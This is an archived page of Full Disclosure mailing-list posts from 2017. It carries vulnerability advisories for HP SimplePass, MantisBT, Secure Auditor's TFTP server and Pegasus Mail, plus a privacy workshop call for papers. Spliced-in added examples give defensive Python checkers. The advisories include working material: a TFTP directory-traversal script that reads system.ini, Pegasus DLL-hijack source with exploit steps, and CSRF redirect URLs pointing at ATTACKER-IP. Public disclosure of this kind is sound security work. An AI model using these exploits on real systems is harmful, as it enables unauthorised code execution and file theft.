[FD] HP SimplePass Local Privilege Escalation

2017-05-22 Thread Rehan Ahmed

# Vulnerability Title: HP SimplePass Local Privilege Escalation
# Advisory Release Date: 05/18/2017
# Credit: Discovered By Rehan Ahmed
# Contact: knight_re...@hotmail.com
# Severity Level: Medium
# Type: Local
# Tested Platform: Windows 8 & 10 x64
# Vendor: HP Inc.
# Vendor Site: http://www.hp.com
# Download Link: http://ftp.hp.com/pub/softpaq/sp64001-64500/sp64339.exe
# Vulnerable Version: HP SimplePass 8.00.49, 8.00.57, 8.01.46 
# Vendor Contacted: 04/03/2017
# Vendor Response: 5/18/2017


Summary:

HP SimplePass allows you to safely store logon information for your favorite 
websites, and use a single method of authentication for your password-protected 
website accounts. Choose a fingerprint, password or PIN to authenticate your 
identity. Your computer must have at least one password-protected Windows User 
Account to use HP SimplePass.

https://support.hp.com/us-en/document/c03653209

#
Issue Details:
#

HP SimplePass is prone to a local privilege-escalation vulnerability due to 
insecure file system permissions that have been granted during installation. 
A local adversary can exploit this issue to gain elevated privileges on the 
affected system.
HP SimplePass installs by default to "C:\Program Files\Hewlett-Packard\SimplePass" 
with very weak folder permissions granting any user full permission to the 
contents of the directory and its subfolders. This allows ample opportunity 
for code execution against any other user running the application. HP SimplePass 
has a few binaries which are typically configured as a service or startup 
program, which makes this particularly easy to leverage.
 
##
 
Proof of Concept
##
a) C:\>icacls "C:\Program Files\Hewlett-Packard\SimplePass"

C:\Program Files\Hewlett-Packard\SimplePass Everyone:(F)
                                            Everyone:(OI)(CI)(IO)(F)
                                            BUILTIN\Administrators:(I)(F)
                                            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                            NT AUTHORITY\SYSTEM:(I)(F)
                                            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                            NT AUTHORITY\Authenticated Users:(I)(M)
                                            NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
                                            BUILTIN\Users:(I)(RX)
                                            BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
  

b) C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" | findstr /i "HP SimplePass"

HP SimplePass Cachedrv Service   Cachedrv server   "C:\Program Files\Hewlett-Packard\SimplePass\cachesrvr.exe"   Auto
HP SimplePass Service            omniserv          C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe      Auto

A user can place a malicious DLL/EXE (e.g. OmniServ.exe) file with one of the 
expected names into that directory and wait until the service is restarted. The 
service cannot be restarted by normal users, but an attacker could just reboot 
the system or wait for the next reboot to happen.

###
3) Mitigation:
###
 

Change the permission on the directory for any group other than Administrators 
to Read/Execute.
Fix: 
https://support.hp.com/us-en/drivers/selfservice/hp-envy-m7-n100-notebook-pc/8499292/model/8788306
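As an added example (not part of the advisory above), a small Python audit that parses icacls output such as the listing quoted in the proof of concept and flags principals that every local user belongs to and that hold a right allowing files to be replaced; the principal and right lists are my own choice, and the sample listing is constructed from the advisory.

```python
import re

# Groups every interactive user belongs to; a write right granted to any of
# them makes the directory effectively world-writable.
BROAD_PRINCIPALS = {"everyone", "builtin\\users",
                    "nt authority\\authenticated users", "nt authority\\interactive"}
# icacls rights that allow creating or replacing files; (I)(OI)(CI)(IO)(NP) are
# inheritance flags, not rights, and are skipped.
WRITE_RIGHTS = {"F", "M", "W", "GW", "GA", "WD", "AD"}
INHERIT_FLAGS = {"I", "OI", "CI", "IO", "NP"}
ACE_RE = re.compile(r"^(?P<who>.+?):(?P<flags>(?:\([^)]*\))+)$")


def parse_aces(output, path):
    """Yield (principal, set of rights) for each ACE in icacls output.

    icacls prints the queried path once, in front of the first ACE, so the
    caller passes that path and it is stripped from the line it precedes.
    """
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue  # blank line or the "Successfully processed" trailer
        rights = set()
        for token in re.findall(r"\(([^)]*)\)", m.group("flags")):
            for part in token.split(","):   # e.g. "(GR,GE)" carries two rights
                part = part.strip()
                if part and part not in INHERIT_FLAGS:
                    rights.add(part)
        yield m.group("who").strip(), rights


def audit_icacls(output, path):
    """Return {principal: sorted write rights} for every risky grant."""
    findings = {}
    for who, rights in parse_aces(output, path):
        risky = rights & WRITE_RIGHTS
        if who.lower() in BROAD_PRINCIPALS and risky:
            findings.setdefault(who, set()).update(risky)
    return {who: sorted(r) for who, r in findings.items()}


# Constructed sample: the listing quoted in the advisory above.
SAMPLE_PATH = r"C:\Program Files\Hewlett-Packard\SimplePass"
SAMPLE_OUTPUT = r"""C:\Program Files\Hewlett-Packard\SimplePass Everyone:(F)
                                            Everyone:(OI)(CI)(IO)(F)
                                            BUILTIN\Administrators:(I)(F)
                                            BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                            NT AUTHORITY\SYSTEM:(I)(F)
                                            NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
                                            NT AUTHORITY\Authenticated Users:(I)(M)
                                            NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
                                            BUILTIN\Users:(I)(RX)
                                            BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for who, rights in audit_icacls(SAMPLE_OUTPUT, SAMPLE_PATH).items():
        print("%s can write: %s" % (who, ",".join(rights)))
```

Run against the advisory's listing it reports both Everyone (F) and the Authenticated Users (M) grant, so the Modify right deserves attention alongside the Full-control one the advisory calls out.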



___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/


[FD] CVE-2017-7620 Mantis Bug Tracker 1.3.10 / v2.3.0 CSRF Permalink Injection

2017-05-22 Thread hyp3rlinx
[+] Credits: John Page a.k.a hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-CSRF-PERMALINK-INJECTION.txt
[+] ISR: ApparitionSec



Vendor:

www.mantisbt.org



Product:
=
Mantis Bug Tracker
1.3.10 / v2.3.0


MantisBT is a popular free web-based bug tracking system. It is written in
PHP and works with MySQL, MS SQL, and PostgreSQL databases.



Vulnerability Type:

CSRF Permalink Injection



CVE Reference:
==
CVE-2017-7620



Security Issue:

Remote attackers can inject arbitrary permalinks into the mantisbt Web
Interface if an authenticated user visits a malicious webpage.

Vulnerable code in the "string_api.php" PHP file, under mantis/core/, did not
account for supplied backslashes.
Line: 270

# Check for URL's pointing to other domains
if( 0 == $t_type || empty( $t_matches['script'] ) ||
    3 == $t_type && preg_match( '@(?:[^:]*)?:/*@', $t_url ) > 0 ) {
    return ( $p_return_absolute ? $t_path . '/' : '' ) . 'index.php';
}

# Start extracting regex matches
$t_script = $t_matches['script'];
$t_script_path = $t_matches['path'];




Exploit/POC:
=
http://VICTIM-IP/mantisbt-2.3.0/permalink_page.php?url=\/ATTACKER-IP;
method="POST">
document.forms[0].submit()


OR

http://VICTIM-IP/permalink_page.php?url=\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1%26sticky%3Don%26sort%3Dlast_updated%26dir%3DDESC%26hide_status%3D90%26match_type%3D0;
method="POST">
document.forms[0].submit()




Network Access:
===
Remote




Severity:
=
Medium



Disclosure Timeline:
=
Vendor Notification: April 9, 2017
Vendor Release Fix: May 15, 2017
Vendor Disclosed: May 20, 2017
May 20, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
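An added example, not MantisBT's code: a simplified model of the scheme check quoted above beside a hardened check that canonicalises the URL the way a browser will read it (backslashes as slashes, resolved against the site base) before deciding whether the permalink stays on-site. SITE_BASE, the case list and the function names are assumptions; the backslash payloads are the ones from the PoC.

```python
import re
from urllib.parse import unquote, urljoin, urlsplit

# The scheme test from the quoted string_api.php; it fires on any ":" in the URL.
SCHEME_RE = re.compile(r"(?:[^:]*)?:/*")
# Where the permalink page lives (constructed; the real site URL comes from config).
SITE_BASE = "https://bugs.example.org/mantisbt/"


def vulnerable_is_local(url):
    """Simplified model of the original check: inspect the raw string only.

    A scheme colon or a leading "//" is rejected, but "\\/host" passes because
    no backslash handling is done, and browsers read "\\/" as "//".
    """
    return SCHEME_RE.search(url) is None and not url.startswith("//")


def hardened_is_local(url, base=SITE_BASE):
    """Decide after canonicalising the URL the way a browser will read it."""
    candidate = unquote(url).strip()          # the parameter arrives URL-encoded
    candidate = candidate.replace("\\", "/")  # browsers treat "\" as "/" in http(s) URLs
    resolved = urlsplit(urljoin(base, candidate))
    site = urlsplit(base)
    # Anything that resolves to another scheme or host is an off-site link.
    return (resolved.scheme, resolved.netloc.lower()) == (site.scheme, site.netloc.lower())


# Constructed cases: (url, whether a correct check should accept it).
CASES = [
    ("view.php?id=1", True),
    ("/mantisbt-2.3.0/search.php?project_id=1&sticky=on", True),
    ("http://ATTACKER-IP/", False),
    ("//ATTACKER-IP", False),
    ("javascript:alert(1)", False),
    (r"\/ATTACKER-IP", False),   # the PoC payload above
    (r"\/ATTACKER-IP%2Fmantisbt-2.3.0%2Fsearch.php%3Fproject_id%3D1", False),
]


def misclassified(check):
    """Return the URLs on which `check` disagrees with the expected verdict."""
    return [url for url, expected in CASES if check(url) != expected]


if __name__ == "__main__":
    print("vulnerable check misses:", misclassified(vulnerable_is_local))
    print("hardened check misses:  ", misclassified(hardened_is_local))
```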



Re: [FD] CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal

2017-05-22 Thread hyp3rlinx
*** Added the product description... ***

[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec



Vendor:

www.secure-bytes.com



Product:
=
Secure Auditor - v3.0

Secure Auditor suite is a unified digital risk management solution for
conducting automated audits on Windows, Oracle and SQL databases
and Cisco devices.



Vulnerability Type:
===
Directory Traversal



CVE Reference:
==
CVE-2017-9024



Security Issue:

Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure
Cisco Auditor (SCA) 3.0, has a
Directory Traversal issue in its TFTP Server, allowing attackers to read
arbitrary files via ../ sequences in a pathname.




Exploit/POC:
=
import sys,socket

print 'Secure Auditor v3.0 / Cisco Config Manager'
print 'TFTP Directory Traversal Exploit'
print 'Read ../../../../Windows/system.ini POC'
print 'hyp3rlinx'

HOST = raw_input("[IP]> ")
FILE = '../../../../Windows/system.ini'
PORT = 69

PAYLOAD = "\x00\x01"#TFTP Read
PAYLOAD += FILE+"\x00"  #Read system.ini using directory traversal
PAYLOAD += "netascii\x00"   #TFTP Type

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()

print "Victim Data located on : %s " %(HOST)
print out.strip()



Network Access:
===
Remote




Severity:
=
High



Disclosure Timeline:
==
Vendor Notification: May 10, 2017
No replies
May 20, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

On Sat, May 20, 2017 at 12:14 AM, hyp3rlinx  wrote:

> [+] Credits: John Page aka HYP3RLINX
> [+] Website: hyp3rlinx.altervista.org
> [+] Source:  http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-
> v3.0-DIRECTORY-TRAVERSAL.txt
> [+] ISR: ApparitionSec
>
>
>
> Vendor:
> 
> www.secure-bytes.com
>
>
>
> Product:
> =
> Secure Auditor - v3.0
>
>
>
> Vulnerability Type:
> ===
> Directory Traversal
>
>
>
> CVE Reference:
> ==
> CVE-2017-9024
>
>
>
> Security Issue:
> 
> Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes
> Secure Cisco Auditor (SCA) 3.0, has a
> Directory Traversal issue in its TFTP Server, allowing attackers to read
> arbitrary files via ../ sequences in a pathname.
>
>
>
>
> Exploit/POC:
> =
> import sys,socket
>
> print 'Secure Auditor v3.0 / Cisco Config Manager'
> print 'TFTP Directory Traversal Exploit'
> print 'Read ../../../../Windows/system.ini POC'
> print 'hyp3rlinx'
>
> HOST = raw_input("[IP]> ")
> FILE = '../../../../Windows/system.ini'
> PORT = 69
>
> PAYLOAD = "\x00\x01"#TFTP Read
> PAYLOAD += FILE+"\x00"  #Read system.ini using directory traversal
> PAYLOAD += "netascii\x00"   #TFTP Type
>
> s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
> s.sendto(PAYLOAD, (HOST, PORT))
> out = s.recv(1024)
> s.close()
>
> print "Victim Data located on : %s " %(HOST)
> print out.strip()
>
>
>
> Network Access:
> ===
> Remote
>
>
>
>
> Severity:
> =
> High
>
>
>
> Disclosure Timeline:
> ==
> Vendor Notification: May 10, 2017
> No replies
> May 20, 2017 : Public Disclosure
>
>
>
> [+] Disclaimer
> The information contained within this advisory is supplied "as-is" with no
> warranties or guarantees of fitness of use or otherwise.
> Permission is hereby granted for the redistribution of this advisory,
> provided that it is not altered except by reformatting it, and
> that due credit is given. Permission is explicitly given for insertion in
> vulnerability databases and similar, provided that due credit
> is given to the author. The author is not responsible for any misuse of
> the information contained herein and accepts no responsibility
> for any damage caused by the use or misuse of this information. The author
> prohibits any malicious use of security related information
> or exploits by the author or elsewhere. All 

[FD] CVE-2017-9024 Secure Auditor - v3.0 Directory Traversal

2017-05-22 Thread hyp3rlinx
[+] Credits: John Page aka HYP3RLINX
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/SECURE-AUDITOR-v3.0-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec



Vendor:

www.secure-bytes.com



Product:
=
Secure Auditor - v3.0



Vulnerability Type:
===
Directory Traversal



CVE Reference:
==
CVE-2017-9024



Security Issue:

Secure Bytes Cisco Configuration Manager, as bundled in Secure Bytes Secure
Cisco Auditor (SCA) 3.0, has a
Directory Traversal issue in its TFTP Server, allowing attackers to read
arbitrary files via ../ sequences in a pathname.




Exploit/POC:
=
import sys,socket

print 'Secure Auditor v3.0 / Cisco Config Manager'
print 'TFTP Directory Traversal Exploit'
print 'Read ../../../../Windows/system.ini POC'
print 'hyp3rlinx'

HOST = raw_input("[IP]> ")
FILE = '../../../../Windows/system.ini'
PORT = 69

PAYLOAD = "\x00\x01"#TFTP Read
PAYLOAD += FILE+"\x00"  #Read system.ini using directory traversal
PAYLOAD += "netascii\x00"   #TFTP Type

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(PAYLOAD, (HOST, PORT))
out = s.recv(1024)
s.close()

print "Victim Data located on : %s " %(HOST)
print out.strip()



Network Access:
===
Remote




Severity:
=
High



Disclosure Timeline:
==
Vendor Notification: May 10, 2017
No replies
May 20, 2017 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx
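An added example, not the vendor's code or the PoC above (which is reposted twice on this page): a parser for the TFTP read request the PoC sends, together with the containment check a TFTP server needs before opening the requested file, so that "../" segments in either slash style cannot leave the served directory. The root directory and file names below are constructed.

```python
import posixpath
import struct

OP_RRQ, OP_ERROR = 1, 5
ERR_ACCESS_VIOLATION = 2
MODES = ("netascii", "octet", "mail")


def parse_rrq(packet):
    """Return (filename, mode) from an RRQ packet; raise ValueError otherwise."""
    if len(packet) < 2:
        raise ValueError("short packet")
    (opcode,) = struct.unpack("!H", packet[:2])
    if opcode != OP_RRQ:
        raise ValueError("not a read request (opcode %d)" % opcode)
    fields = packet[2:].split(b"\x00")
    # "name\0mode\0" splits into [name, mode, b""] when both terminators exist
    if len(fields) < 3 or fields[1] == b"":
        raise ValueError("malformed RRQ: filename and mode must be NUL-terminated")
    filename = fields[0].decode("ascii", "replace")
    mode = fields[1].decode("ascii", "replace").lower()
    if mode not in MODES:
        raise ValueError("unknown transfer mode %r" % mode)
    return filename, mode


def resolve_in_root(root, filename):
    """Map filename under root; return None if it would leave root."""
    root = posixpath.normpath(root)
    name = filename.replace("\\", "/")      # the affected server runs on Windows
    head = name.split("/", 1)[0]
    if not name or name.startswith("/") or ":" in head:
        return None                          # empty, absolute, or drive-letter path
    target = posixpath.normpath(posixpath.join(root, name))
    if target == root or not target.startswith(root + "/"):
        return None                          # ".." climbed out of the root
    return target


def error_packet(code, message):
    """Build the TFTP ERROR packet a server should answer a bad request with."""
    return struct.pack("!HH", OP_ERROR, code) + message.encode("ascii") + b"\x00"


def handle_rrq(packet, root):
    """Return ("ok", path) for a safe request, else ("error", error packet)."""
    try:
        filename, _mode = parse_rrq(packet)
    except ValueError as exc:
        return "error", error_packet(0, str(exc))
    path = resolve_in_root(root, filename)
    if path is None:
        return "error", error_packet(ERR_ACCESS_VIOLATION, "Access violation")
    return "ok", path


# Constructed sample: the read request the PoC above sends.
POC_PACKET = b"\x00\x01" + b"../../../../Windows/system.ini\x00" + b"netascii\x00"
TFTP_ROOT = "/srv/tftp"

if __name__ == "__main__":
    print(handle_rrq(POC_PACKET, TFTP_ROOT))
    print(handle_rrq(b"\x00\x01router1.cfg\x00octet\x00", TFTP_ROOT))
```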



[FD] CVE-2017-9046 Pegasus "winpm-32.exe" v4.72 Mailto: Link Remote Code Execution

2017-05-22 Thread hyp3rlinx
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/PEGASUS-MAILTO-LINK-REMOTE-CODE-EXECUTION.txt
[+] ISR: APPARITIONSEC



Vendor:
=
www.pmail.com



Product:
===
Pegasus "winpm-32.exe"
v4.72 build 572


Pegasus Mail: Pegasus Mail is a free, standards-based electronic mail
client suitable for use by single or multiple users on single
computers or on local area networks. A proven product, it has served
millions of users since it was released in 1990.



Vulnerability Type:
==
Remote Code Execution




CVE Reference:
==
CVE-2017-9046



Security Issue:

Pegasus Mail has a DLL Load Flaw that allows arbitrary code execution by
clicking an HTML "mailto:" link
if a DLL named "ssgp.dll" exists on the victim's Desktop. Tested
successfully using the Internet Explorer Web Browser.

e.g.

mailto:n...@victim.com;>Link text

Place "ssgp.dll" on the desktop, then visit the webpage in "Internet
Explorer" and click the mailto: link; arbitrary code is executed
and Pegasus (pmail) is then launched.

The user needs to have set up PMAIL with the "mailto:" link option on install.


Exploit:

1) Set Pegasus as the default Email client for opening Emails, and set up PMAIL
with the "mailto:" link option on install.


2) Compile "ssgp.dll" as DLL using below 'C' code.

#include <windows.h>

//gcc -c ssgp.c
//gcc -shared -o ssgp.dll ssgp.o

BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
  switch (reason) {
  case DLL_PROCESS_ATTACH:
    MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK);
    break;
  }

  return TRUE; /* returning FALSE would make the loader unload the DLL again */
}



3) Place "ssgp.dll" on Desktop


4) Create an HTML file with following in the web server root directory.
mailto:n...@victim.com;>Pegasus Exploit POC


5) Open webpage in InternetExplorer Web Browser and click malicious mailto:
link.


Our code gets executed...



Network Access:
===
Remote




Severity:
=
High



Disclosure Timeline:
=
Vendor Notification:  October 8, 2016
Vendor supposedly fixed: January 21, 2016
May 19, 2017  : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx



[FD] CFP - WPES - 2017 Workshop on Privacy in the Electronic Society

2017-05-22 Thread Bill Garrison
CALL FOR PAPERS
===

**
  2017 Workshop on Privacy in the Electronic Society
 (WPES 2017)
Dallas, Texas, USA - October 30, 2017
 https://cs.pitt.edu/wpes2017
**

The need for privacy-aware policies, regulations, and techniques has
been widely recognized. This workshop discusses the problems of
privacy in the global interconnected societies and possible solutions.
The 2017 Workshop, held in conjunction with the ACM CCS conference, is
the sixteenth in a yearly forum for papers on all the different
aspects of privacy in today's electronic society.

The workshop seeks submissions from academia and industry presenting
novel research on all theoretical and practical aspects of electronic
privacy, as well as experimental studies of fielded systems. We
encourage submissions from other communities such as law and business
that present these communities' perspectives on technological issues.
Topics of interest include, but are not limited to:

- anonymization and transparency
- crowdsourcing for privacy and security
- data correlation and leakage attacks
- data security and privacy
- data and computations integrity in emerging scenarios
- electronic communication privacy
- economics of privacy
- information dissemination control
- models, languages, and techniques for big data protection
- personally identifiable information
- privacy-aware access control
- privacy and anonymity on the web
- privacy in biometric systems
- privacy in cloud and grid systems
- privacy and confidentiality management
- privacy and data mining
- privacy in the Internet of Things
- privacy in the digital business
- privacy in the electronic records
- privacy enhancing technologies
- privacy and human rights
- privacy in health care and public administration
- privacy metrics
- privacy in mobile systems
- privacy in outsourced scenarios
- privacy policies
- privacy vs. security
- privacy of provenance data
- privacy in social networks
- privacy threats
- privacy and virtual identity
- user profiling
- wireless privacy


PAPER SUBMISSIONS
-

Submitted papers must not substantially overlap papers that have been
published or that are simultaneously submitted to a journal or a
conference with proceedings. Regular submissions should be at most 10
pages in the ACM double-column format
(http://www.acm.org/sigs/publications/proceedings-templates) including
bibliography, but excluding well-marked appendices, and at most 12
pages total. Committee members are not required to read the
appendices, and so the paper should be intelligible without them.
Submissions should not be anonymized. The workshop will also consider
short submissions of up to 4 pages for results that are preliminary or
that simply require few pages to describe. Authors of regular
submitted papers will indicate at the time of submission whether they
would like their paper to also be considered for publication as a
short paper (4 proceedings pages).

Submissions are to be made to the submission web site at
https://easychair.org/conferences/?conf=wpes2017. You will be
requested to upload the file of your paper (in PDF format only).
Submissions not meeting these guidelines risk rejection without
consideration of their merits. Papers must be received by the deadline
of **August 4, 2016** to be considered. Notification of acceptance or
rejection will be sent to authors by September 8, 2017. The camera
ready must be prepared by September 17, 2017 (firm). Proceedings of
the workshop will be published by ACM on a CD, available to the
workshop attendees. Papers will be included in the ACM Digital
Library, with a specific ISBN. Each accepted paper must be presented
by an author, who will have to be registered by the early-bird
registration deadline.


IMPORTANT DATES
---

Paper Submission due: August 4, 2017 (11:59 PM American Samoa Time)

Notification to authors: September 8, 2017 (11:59 PM American Samoa Time)

Camera ready due: September 17, 2017


PROGRAM CHAIR
-

Adam J. Lee
University of Pittsburgh, USA


PUBLICITY CHAIR
---

William C. Garrison III
University of Pittsburgh, USA


PROGRAM COMMITTEE
-

TBD


STEERING COMMITTEE
--

Sabrina De Capitani di Vimercati, Università degli Studi di Milano, Italy
Sushil Jajodia, George Mason University, USA
Pierangela Samarati (Chair), Università degli Studi di Milano, Italy
Paul Syverson, Naval Research Laboratory, USA


Submissions are to be made at:
https://easychair.org/conferences/?conf=wpes2017

This call for papers and additional information about the conference
can be found at https://cs.pitt.edu/wpes2017
